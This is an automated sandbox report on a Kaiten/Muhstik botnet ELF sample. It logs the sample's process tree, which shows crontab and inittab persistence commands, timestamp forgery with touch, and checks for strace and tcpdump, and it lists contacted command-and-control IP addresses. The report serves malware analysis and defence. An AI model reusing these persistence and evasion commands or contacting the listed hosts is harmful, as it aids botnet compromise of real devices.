Malware Analysis Report

2024-11-13 17:34

Sample ID 220314-gmgy8affbn
Target 4aa80ec9c4af1849fb3f0c82cf82c99b
SHA256 4817893f8e724cbc5186e17f46d316223b7683dcbc9643e364b5913f8d2a9197
Tags
persistence suricata kaiten
score
10/10


Analysis Overview

score
10/10

SHA256

4817893f8e724cbc5186e17f46d316223b7683dcbc9643e364b5913f8d2a9197

Threat Level: Known bad

The file 4aa80ec9c4af1849fb3f0c82cf82c99b was found to be: Known bad.

Malicious Activity Summary

persistence suricata kaiten

Kaiten family

suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity

Identified Kaiten Bot

Writes file to system bin folder

Modifies rc script

Writes file to user bin folder

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-14 05:55

Signatures

Identified Kaiten Bot

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-14 05:55

Reported

2022-03-14 05:57

Platform

debian9-mipsbe-en-20211208

Max time kernel

0s

Max time network

120s

Command Line

[./4aa80ec9c4af1849fb3f0c82cf82c99b]

Signatures

suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity

suricata

Writes file to system bin folder

Description Indicator Process Target
/bin/crontab /bin/crontab N/A N/A
/bin/nvram /bin/nvram N/A N/A
/bin/uname /bin/uname N/A N/A

Modifies rc script

persistence
Description Indicator Process Target
/etc/rc.local /etc/rc.local ./4aa80ec9c4af1849fb3f0c82cf82c99b N/A

Writes file to user bin folder

Description Indicator Process Target
/usr/bin/crontab /usr/bin/crontab N/A N/A
/usr/sbin/nvram /usr/sbin/nvram N/A N/A

Reads runtime system information

Description Indicator Process Target
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /bin/cp N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /bin/cp N/A
/proc/filesystems /proc/filesystems /bin/cp N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /bin/cp N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A

Writes file to tmp directory

Description Indicator Process Target
/tmp/.bawtz /tmp/.bawtz ./4aa80ec9c4af1849fb3f0c82cf82c99b N/A
/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /bin/cp N/A
/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /bin/cp N/A
/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /bin/cp N/A
/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /bin/cp N/A

Processes

./4aa80ec9c4af1849fb3f0c82cf82c99b

[./4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/sh

[sh -c pidof -x strace > /dev/null]

/bin/pidof

[pidof -x strace]

/bin/sh

[sh -c pidof -x tcpdump > /dev/null]

/bin/pidof

[pidof -x tcpdump]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b" > /etc/inittab2]

/bin/sh

[sh -c crontab -r]

/bin/sh

[sh -c crontab -l | grep /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b | grep -v "no cron" || (crontab -l ; echo "* * * * * /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b > /dev/null 2>&1 &") | crontab -]

/bin/grep

[grep /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/cat

[cat /etc/inittab]

/usr/bin/crontab

[crontab -r]

/bin/grep

[grep -v /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c echo "0:2345:respawn:/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b" >> /etc/inittab2]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/sh

[sh -c /bin/uname -n]

/bin/uname

[/bin/uname -n]

/bin/cp

[cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b | grep -v "no cron" || (crontab -l ; echo "* * * * * /dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b > /dev/null 2>&1 &") | crontab -]

/usr/bin/crontab

[crontab -l]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep /dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/grep

[grep -v /dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c echo "0:2345:respawn:/dev/shm/4aa80ec9c4af1849fb3f0c82cf82c99b" >> /etc/inittab2]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab -]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/cp

[cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b > /dev/null 2>&1 &") | crontab -]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v /var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/grep

[grep /var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/grep

[grep -v no cron]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c echo "0:2345:respawn:/var/tmp/4aa80ec9c4af1849fb3f0c82cf82c99b" >> /etc/inittab2]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/cp

[cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b > /dev/null 2>&1 &") | crontab -]

/bin/grep

[grep /var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/grep

[grep -v /var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/grep

[grep -v no cron]

/bin/cat

[cat /etc/inittab]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c echo "0:2345:respawn:/var/lock/4aa80ec9c4af1849fb3f0c82cf82c99b" >> /etc/inittab2]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /var/run/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/cp

[cp -f /tmp/4aa80ec9c4af1849fb3f0c82cf82c99b /var/run/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/run/4aa80ec9c4af1849fb3f0c82cf82c99b" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/run/4aa80ec9c4af1849fb3f0c82cf82c99b | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/run/4aa80ec9c4af1849fb3f0c82cf82c99b > /dev/null 2>&1 &") | crontab -]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v no cron]

/bin/grep

[grep /var/run/4aa80ec9c4af1849fb3f0c82cf82c99b]

/bin/grep

[grep -v /var/run/4aa80ec9c4af1849fb3f0c82cf82c99b]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c echo "0:2345:respawn:/var/run/4aa80ec9c4af1849fb3f0c82cf82c99b" >> /etc/inittab2]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

Network

Country Destination Domain Proto
US 85.120.225.141:8080 tcp
SG 185.201.8.176:8080 tcp
US 144.172.71.162:8080 tcp
RO 89.33.194.89:8080 tcp
SG 156.67.218.115:8080 tcp
SG 156.67.218.115:8080 tcp
SG 156.67.218.115:8080 tcp
SG 37.44.244.106:8080 tcp

Files

N/A